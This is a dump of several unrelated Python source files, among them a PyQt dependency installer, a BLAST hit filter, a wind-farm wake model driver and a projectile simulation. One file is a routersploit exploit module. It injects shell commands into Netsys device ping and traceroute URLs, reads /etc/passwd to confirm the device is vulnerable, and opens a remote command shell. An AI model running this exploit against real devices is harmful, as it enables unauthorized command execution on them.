self.setWindowTitle(f'TkPy{tkpy_version} 依赖')
self.setWindowIcon(
QIcon(os.path.join(images_icon_dir, 'help_icons', 'tools.png')))
self.layout = QVBoxLayout(self)
self.text_show_label = QLabel()
self.view_list = QListWidget()
self.setLayout(self.layout)
self.get_start()
def get_start(self):
with open(os.path.join(static_dir, 'relys.txt'), encoding='UTF-8') as f:
count = 0
for package_name in f.read().split('\n'):
if package_name:
self.view_list.insertItem(
count, QListWidgetItem(package_name))
count += 1
self.layout.addWidget(self.text_show_label)
self.layout.addWidget(self.view_list)
self.text_show_label.setText('<h4>所有依赖: </h4>')
class InstallDialog(RelyDialog):
def __init__(self):
RelyDialog.__init__(self)
self.setWindowTitle('安装TkPy3的依赖')
self.buttons_frame = QWidget()
self.buttons_layout = QHBoxLayout(self.buttons_frame)
self.buttons_frame.setLayout(self.buttons_layout)
self.installButton = QPushButton()
self.cancelButton = QPushButton()
self.yesnoinstall = False
self.layout.addWidget(self.buttons_frame)
install_packages = []
for i in range(self.view_list.count()):
install_packages.append(self.view_list.item(i).text())
self.install_process = InstallThread(self, *install_packages)
self.init_ui()
def init_ui(self):
self.buttons_layout.addWidget(self.installButton)
self.buttons_layout.addWidget(self.cancelButton)
self.installButton.setText('现在安装所有依赖')
self.cancelButton.setText('取消安装')
self.cancelButton.clicked.connect(self.close)
self.installButton.clicked.connect(self.install_relys)
def closeEvent(self, event: QtGui.QCloseEvent) -> None:
if self.yesnoinstall:
event.accept()
return
res = QMessageBox.question(self, '取消安装', '是否取消安装? \n\
如果你想再次运行安装程序,请在终端运行 \n\npython -m TkPy3.tkpy3_tools.relys')
if res == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def install_relys(self):
def install():
def done():
show_label.setText('<p>安装完成</p>')
exit_button.setDisabled(False)
message.append('安装完成。')
dialog = QDialog()
dialog.resize(600, 600)
dialog.setWindowFlags(Qt.WindowStaysOnTopHint |
Qt.FramelessWindowHint)
dialog.setWindowTitle('TkPy3安装')
layout = QVBoxLayout()
title_label = QLabel()
show_label = QLabel()
message = QTextBrowser()
exit_button = QPushButton()
load_processbar = LoadWidget()
title_label.setText('<h1>TkPy3安装</h1>')
exit_button.setText('退出')
exit_button.setDisabled(True)
layout.addWidget(title_label, 0)
layout.addWidget(show_label)
layout.addWidget(message)
layout.addWidget(exit_button)
message.addAction(QAction(load_processbar))
dialog.setLayout(layout)
install_packages = []
for i in range(self.view_list.count()):
install_packages.append(self.view_list.item(i).text())
self.close()
self.install_process.start()
message.append('开始安装。')
exit_button.clicked.connect(dialog.close)
self.install_process.falsed.connect(
lambda p: message.append(f'Package {p} 安装失败。'))
self.install_process.ok.connect(
lambda p: message.append(f'Package {p} 安装成功。'))
self.install_process.package_name.connect(lambda text: (show_label.setText(
f'<h3>正在安装中... ...</h3><p>正在安装: {text}</p>'), message.append(f'安装 {text}')))
self.install_process.done.connect(done)
dialog.exec_()
res = QMessageBox.question(self, '问题', '是否现在安装所有依赖?')
if res == QMessageBox.No:
return
self.yesnoinstall = True
install()
if __name__ == "__main__":
app = QApplication(sys.argv)
tkpy3_setup(app)
dialog = InstallDialog()
sys.exit(dialog.exec_())
|
py | b4043f7e7f2376babd7d2e6bcdf29b612c97d833 | #!/usr/bin/env python
import logging, os, sys
from argparse import (ArgumentParser, FileType)
from mob_suite.blast import BlastReader
def parse_args():
"Parse the input arguments, use '-h' for help"
parser = ArgumentParser(description='Filter overlapping queries')
parser.add_argument('--infile', type=str, required=True, help='Input file to process')
parser.add_argument('--outdir', type=str, required=True, help='Output directory')
    parser.add_argument('--min_overlap', type=int, required=False, help='Minimum bp overlap', default=5)
return parser.parse_args()
def filter_overlaping_records(blast_df, overlap_threshold,contig_id_col,contig_start_col,contig_end_col,bitscore_col):
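    # Assumes hits are sorted by contig and start coordinate; when consecutive hits on
    # the same contig overlap by more than overlap_threshold bp, the hit with the lower
    # bitscore is dropped.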
prev_contig_id = ''
prev_index = -1
prev_contig_start = -1
prev_contig_end = -1
prev_score = -1
filter_indexes = list()
exclude_filter = dict()
for index, row in blast_df.iterrows():
contig_id = row['sseqid']
contig_start = row['sstart']
contig_end = row['send']
score = row['bitscore']
if prev_contig_id == '':
prev_index = index
prev_contig_id = contig_id
prev_contig_start = contig_start
prev_contig_end = contig_end
prev_score = score
continue
if contig_id != prev_contig_id:
prev_index = index
prev_contig_id = contig_id
prev_contig_start = contig_start
prev_contig_end = contig_end
prev_score = score
continue
if (contig_start >= prev_contig_start and contig_start <= prev_contig_end) or (contig_end >= prev_contig_start and contig_end <= prev_contig_end):
overlap = abs(contig_start - prev_contig_end)
if overlap > overlap_threshold:
if prev_score > score:
filter_indexes.append(index)
else:
filter_indexes.append(prev_index)
prev_index = index
prev_contig_id = contig_id
prev_contig_start = contig_start
prev_contig_end = contig_end
prev_score = score
for index in exclude_filter:
filter_indexes.append(index)
indexes = dict()
for i in blast_df.iterrows():
indexes[i[0]] = ''
blast_df.drop(filter_indexes, inplace=True)
return blast_df.reset_index(drop=True)
def fixStart(blast_df):
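    # Swap coordinates where BLAST reported them in reverse orientation so that
    # start <= end holds for both subject and query.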
for index, row in blast_df.iterrows():
sstart = blast_df.at[index, 'sstart']
send = blast_df.at[index, 'send']
# print "{}\t{}".format(sstart,send)
if send < sstart:
temp = sstart
blast_df.at[index, 'sstart'] = send
blast_df.at[index, 'send'] = temp
# print "====>{}\t{}".format(self.blast_df.at[index, 'sstart'], self.blast_df.at[index, 'send'])
qstart = blast_df.at[index, 'qstart']
qend = blast_df.at[index, 'qend']
if qend < qstart:
temp = qstart
blast_df.at[index, 'qstart'] = qend
blast_df.at[index, 'qend'] = temp
return blast_df
def filter_blast(blast_results_file, min_ident, min_cov, evalue, overlap):
if os.path.getsize(blast_results_file) == 0:
return dict()
blast_df = BlastReader(blast_results_file).df
blast_df = blast_df.loc[blast_df['pident'] >= min_ident]
blast_df = blast_df.loc[blast_df['qcovhsp'] >= min_cov]
blast_df = fixStart(blast_df)
blast_df = blast_df.sort_values(['sseqid','sstart', 'send', 'bitscore'], ascending=[True, True, True, False])
blast_df = blast_df.reset_index(drop=True)
size = str(len(blast_df))
prev_size = 0
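    # Re-run the overlap filter until the number of rows stops changing (fixed point).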
while size != prev_size:
blast_df = filter_overlaping_records(blast_df, overlap, 'sseqid', 'sstart', 'send', 'bitscore')
prev_size = size
size = str(len(blast_df))
return blast_df
def main():
logging.info('Running plasmid detector v. {}'.format('0.1'))
args = parse_args()
if not args.infile:
logging.info('Error, no blast file specified, please specify one')
sys.exit()
if not args.outdir:
logging.info('Error, no output directory specified, please specify one')
sys.exit()
if not os.path.isdir(args.outdir):
os.mkdir(args.outdir, 0o755)
blast_file = args.infile
base_file_name = os.path.splitext(os.path.basename(blast_file))[0]
out_dir = args.outdir
blast_results_file = os.path.join(out_dir, base_file_name+'_blast_results.txt')
processed_blast_results = filter_blast(blast_file, 95, 95, 0.00001, 5)
if isinstance(processed_blast_results,dict):
results_fh = open(blast_results_file, 'w')
results_fh.write('')
results_fh.close()
else:
processed_blast_results.to_csv(blast_results_file, sep='\t', header=True, line_terminator='\n', index=False)
if __name__ == '__main__':
    main() |
py | b4044064fc639f642f9746120c32a9209d0d1cb8 |
rx = str(input("emt"))
print(rx) |
py | b40440a2ef1da75c8268f164ae39d7748639425c | from neuralWake import *
from optimisation import *
import synth_and_train as st
def main():
# TRAIN
if train_net == 1:
# Start trainingtimer
t0 = time.time()
# Create the dataset
X_train, X_val, X_test, y_train, y_val, y_test = st.create()
# Set neural model
model = wakeNet().to(device)
if parallel == True and device == "cpu":
# Parallel CPU training
print("Training on parallel CPU cores...")
# Feed domain points to train the model
lazy_results = []
for pixel in range(rows):
lazy_result = dask.delayed(st.training)(
pixel, X_train, X_val, X_test, y_train, y_val, y_test, model
)
lazy_results.append(lazy_result)
results = dask.compute(*lazy_results, num_workers=para_workers)
else:
# Serial CPU tarining (or GPU training depending on set device)
print("Training...")
# Feed domain points to train the model
for pixel in range(rows):
st.training(pixel, X_train, X_val, X_test, y_train, y_val, y_test, model)
# End training timer
t1 = time.time()
print("Training took: ", int(t1 - t0), " seconds")
# Save model weights
torch.save(model, weights_path)
# TEST
else:
# Sets test case value
test = int(input("Please enter the test case number (1-4): "))
if test == 1:
# Single and multiple wake comparisons
# Recommeded denoise=7 (in info.json)
# Single
xs = np.array([1 * D])
ys = np.array([1 * D])
yws = [-30]
compare(
plots=True,
yws=yws,
ws=12,
ti=0.12,
xs=xs,
ys=ys,
print_times=True,
single=False,
)
# Multiple
xs = np.array([1*D, 1*D, 1*D,
4.5*D, 4.5*D, 4.5*D,
8*D, 8*D, 8*D])
ys = np.array([1*D, 3*D, 5*D,
2*D, 4*D, 6*D,
1*D, 3*D, 5*D])
yws = [30, -30, 30, -30, 30, -30, 30, -30, 30, -30]
# Case layout (yaw)
xs = np.array([0, 100, 500, 500, 2500, 2500])
ys = np.array([600, 1250, 1000, 250, 500, 0])
yws = np.array([0, 0, 0, 0, 0, 0])
compare(
plots=True,
yws=yws,
ws=11,
ti=0.05,
xs=xs,
ys=ys,
print_times=True,
single=False
)
# Case A (yaw)
xs = np.array([1*D, 1*D, 8*D, 8*D, 15*D, 15*D])
ys = np.array([1*D, 7*D, 1*D, 7*D, 1*D, 7*D])
yws = np.array([26, 26, 20, 20, 0, 0])
compare(
plots=True,
yws=yws,
ws=7,
ti=0.05,
xs=xs,
ys=ys,
print_times=True,
single=False)
# Case B (yaw)
xs = np.array([1*D, 1*D, 1*D, 4.5*D, 4.5*D,
8*D, 8*D, 8*D, 11.5*D, 11.5*D,
15*D, 15*D, 15*D, 18.5*D, 18.5*D])
ys = np.array([1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D])
yws = np.array([25, 24, 24.5, 24.5, 24, 19, 18, 18, 18, 18, 0, 1, 1, 0, 0])
compare(
plots=True,
yws=yws,
ws=7,
ti=0.05,
xs=xs,
ys=ys,
print_times=True,
single=False
)
# Multiple
xs = np.array([1*D, 1*D,
8*D, 8*D])
ys = np.array([1*D, 5*D,
1*D, 5*D])
yws = [30, 30, -30, -30]
compare(
plots=True,
yws=yws,
ws=6,
ti=0.12,
xs=xs,
ys=ys,
print_times=True)
if test == 2:
# Superposition test
# Recommeded denoise=7 (in info.json)
# SOS 1
ys = np.array([0, 0, 0, 4 * D, 4 * D, 4 * D])
xs = np.array([1 * D, 8 * D, 15 * D, 1 * D, 8 * D, 15 * D])
yws = np.array([0, 0, 0, 0, 0, 0])
compare(plots=True, yws=yws, ws=11, ti=0.12, xs=xs, ys=ys, print_times=True)
# SOS 2
ys = np.array([0, 1 * D, 0.5 * D])
xs = np.array([1 * D, 1 * D, 4 * D])
yws = np.array([0, 0, 0])
compare(plots=True, yws=yws, ws=11, ti=0.12, xs=xs, ys=ys, print_times=True)
if test == 3:
# Yaw Optimisation
xs = np.array([1*D, 5.762*D])
ys = np.array([1*D, 1*D])
print("Yaw vs power study layout:")
compare(plots=True, yws=[0, 0], ws=9, ti=0.1, xs=xs, ys=ys, print_times=True)
yawVsPowerContour(ws=9, ti=0.1, xs=xs, ys=ys)
input()
# Case A (yaw)
xs = np.array([1*D, 1*D, 8*D, 8*D, 15*D, 15*D])
ys = np.array([1*D, 7*D, 1*D, 7*D, 1*D, 7*D])
florisOptimiser(ws=7, ti=0.11, layout_x=xs, layout_y=ys, plots=True)
neuralOptimiser(ws=7, ti=0.11, xs=xs, ys=ys, plots=True, floris_gain=True)
# # Yaw power heatmaps
heatmap(xs, ys, res=10, farm_opt=False)
input()
# Case B (yaw)
xs = np.array([1*D, 1*D, 1*D, 4.5*D, 4.5*D,
8*D, 8*D, 8*D, 11.5*D, 11.5*D,
15*D, 15*D, 15*D, 18.5*D, 18.5*D])
ys = np.array([1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D])
florisOptimiser(ws=11, ti=0.11, layout_x=xs, layout_y=ys, plots=True)
neuralOptimiser(ws=11, ti=0.11, xs=xs, ys=ys, plots=True, floris_gain=True)
# Yaw power heatmaps
heatmap(xs, ys, res=10, farm_opt=False)
if test == 4:
# Layout Optimisation
# Case C
xs = np.array([1*D, 1*D, 8*D, 8*D, 15*D, 15*D])
ys = np.array([1*D, 5*D, 1*D, 5*D, 1*D, 5*D])
florisOptimiser(ws=7, ti=0.05, layout_x=xs, layout_y=ys, plots=True, mode='farm')
neuralOptimiser(ws=7, ti=0.05, xs=xs, ys=ys, plots=True, floris_gain=True, mode='farm')
# Layout power heatmaps
heatmap(xs, ys, farm_opt=True)
if __name__=="__main__":
main()
|
py | b40441624c21fac043c73d7f9d996dedfc3e082c | from public import * # noqa
def init():
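    # Scrape the GARR BackBox mirror index for .iso links and collect
    # (url, arch, size, version) tuples.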
array = []
base_url = "https://backbox.mirror.garr.it"
html = bs(requests.get(base_url).text, "html.parser")
    for filename in html.find_all("a", {"href": re.compile(r"^.*\.iso$")}):
iso_url = f"{base_url}/{filename['href']}"
iso_arch = get_iso_arch(iso_url)
iso_size = get_iso_size(iso_url)
iso_version = re.search(r"backbox-(\d+)", iso_url).group(1)
array.append((iso_url, iso_arch, iso_size, iso_version))
return array
|
py | b4044217792cce0a4a8c69e11ca89ef2da2c2e06 | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#***************************************
#* Simple analytic test ExternalModule *
#***************************************
#
# Simulates time-dependent track of a projectile through the air from start to 0,
# assuming no air resistance.
# Inputs:
# (x0,y0) - initial position
# v0 - initial total velocity
# ang - angle of initial motion, in degrees, with respect to flat ground
# Outputs:
# (x,y) - vector positions of projectile in time
# t - corresponding time steps
#
import numpy as np
def prange(v,th,y0=0,g=9.8):
"""
Calculates the analytic range.
@ In, v, float, velocity of the projectile
@ In, th, float, angle to the ground for initial projectile motion
@ In, y0, float, optional, initial height of projectile
@ In, g, float, optional, gravitational constant (m/s/s)
@ Out, prange, float, range
"""
return v*np.cos(th)/g * (v*np.sin(th) + np.sqrt(v*v*np.sin(th)**2+2.*g*y0))
def time_to_ground(v,th,y0=0,g=9.8):
"""
Calculates the analytic time of flight
@ In, v, float, velocity of the projectile
@ In, th, float, angle to the ground for initial projectile motion
@ In, y0, float, optional, initial height of projectile
@ In, g, float, optional, gravitational constant (m/s/s)
@ Out, time_to_ground, float, time projectile is above the ground
"""
return v*np.sin(th)/g + np.sqrt(v*v*np.sin(th)**2+2.*g*y0)/g
def x_pos(x0,v,t):
"""
Calculates the x position in time
@ In, x0, float, initial horizontal position
@ In, v, float, velocity of the projectile
@ In, t, float, time of flight
@ Out, x_pos, float, horizontal position
"""
return x0 + v*t
def y_pos(y0,v,t):
"""
Calculates the analytic vertical position in time
@ In, y0, float, initial vertical position
@ In, v, float, velocity of the projectile
@ In, t, float, time of flight
@ Out, y_pos, float, vertical position
"""
return y0 + v*t - 4.9*t*t
def run(self,Input):
"""
Method require by RAVEN to run this as an external model.
@ In, self, object, object to store members on
@ In, Input, dict, dictionary containing inputs from RAVEN
@ Out, None
"""
x0 = Input.get('x0',0.0)
y0 = Input.get('y0',0.0)
v0 = Input.get('v0',1.0)
ang = Input.get('angle',45.)*np.pi/180.
self.x0 = x0
self.y0 = y0
self.v0 = v0
self.ang = ang
ts = np.linspace(0,0.1,10)
#ts = np.linspace(0,time_to_ground(v0,ang,y0),20)
vx0 = np.cos(ang)*v0
vy0 = np.sin(ang)*v0
r = prange(v0,ang,y0)
self.x = np.zeros(len(ts))
self.y = np.zeros(len(ts))
self.r = np.zeros(len(ts))
for i,t in enumerate(ts):
self.x[i] = x_pos(x0,vx0,t)
self.y[i] = y_pos(y0,vy0,t)
self.r[i] = r
self.time = ts
#can be used as a code as well
if __name__=="__main__":
import sys
inFile = sys.argv[sys.argv.index('-i')+1]
outFile = sys.argv[sys.argv.index('-o')+1]
#construct the input
Input = {}
for line in open(inFile,'r'):
arg,val = (a.strip() for a in line.split('='))
Input[arg] = float(val)
#make a dummy class to hold values
class IO:
"""
Dummy class to hold values like RAVEN does
"""
pass
io = IO()
#run the code
run(io,Input)
#write output
outFile = open(outFile+'.csv','w')
outFile.writelines('x0,y0,v0,ang,r,t,x,y\n')
inpstr = ','.join(str(i) for i in (io.x0,io.y0,io.v0,io.ang))
for i in range(len(io.time)):
outFile.writelines(inpstr+',%f,%f,%f,%f\n' %(io.r[i],io.x[i],io.y[i],io.time[i]))
outFile.close()
|
py | b4044304b04b4532b51a0f22d707bc50089503b0 | import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
random_text,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netsys multiple remote command execution vulnerabilities.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Netsys Multi RCE',
'description': 'Exploits Netsys multiple remote command execution vulnerabilities that allows executing commands on operating system level',
'authors': [
'admin <admin[at]bbs.00wz.top>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://bbs.00wz.top/forum.php?mod=viewthread&tid=12630',
],
'devices': [
'Multiple Netsys',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(9090, 'Target port') # default port
injections = ["/view/IPV6/ipv6networktool/traceroute/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
"/view/systemConfig/systemTool/ping/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
"/view/systemConfig/systemTool/traceRoute/traceroute.php?text_target=127.0.0.1&text_ageout=2&text_minttl=1&text_maxttl=1|{}"]
valid = None
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
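        # Echo a random marker before and after the injected command so its output
        # can be extracted from the HTTP response.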
marker = random_text(16)
cmd = cmd.replace(" ", "+")
payload = "echo+{};{};echo+{};".format(marker, cmd, marker)
inj = self.valid.format(payload)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
return ""
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
@mute
def check(self):
cmd = "cat+/etc/passwd;"
for injection in self.injections:
inj = injection.format(cmd)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
continue
if "root:" in response.text:
self.valid = injection
return True # target is vulnerable
return False # target not vulnerable
|
py | b4044335ada82111b8357922b6f89f486129af33 | from collections import deque
from core.observers.AbstractObserver import AbstractObserver
import datetime
import time
class NotifyCheckerObserver(AbstractObserver):
__instance__ = None
def __init__(self):
super().__init__()
self._msg_queue = deque()
def set_group(self, group):
self._group = group
def execute(self, *args):
def first_zero(some_time):
if len(str(some_time)) == 1:
some_time = '0' + str(some_time)
return some_time
return some_time
start_min = 0
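        # Wake up roughly every 40 s but only dispatch commands once per wall-clock minute.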
while True:
today = datetime.datetime.today().timetuple()
minute = today.tm_min
if start_min != minute:
start_min = minute
else:
time.sleep(40)
continue
wday = today.tm_wday
hour = today.tm_hour
ctime = '{hour}:{minute}'.format(
hour=hour,
minute=first_zero(minute))
for command in self.commands:
# print(command.name, command.activate_times, command.activate_days)
if wday in command.activate_days and \
ctime in command.activate_times:
self._msg_queue.append(command.autostart_func(*args))
while len(self._msg_queue) > 0:
message = self._msg_queue.popleft()
if message:
self._group.broadcast(self._group.get_members(), message)
if __name__ == '__main__':
from commands import UntillEge
notify_observer = NotifyCheckerObserver()
notify_observer.add(UntillEge('18-05-28'))
notify_observer.execute()
|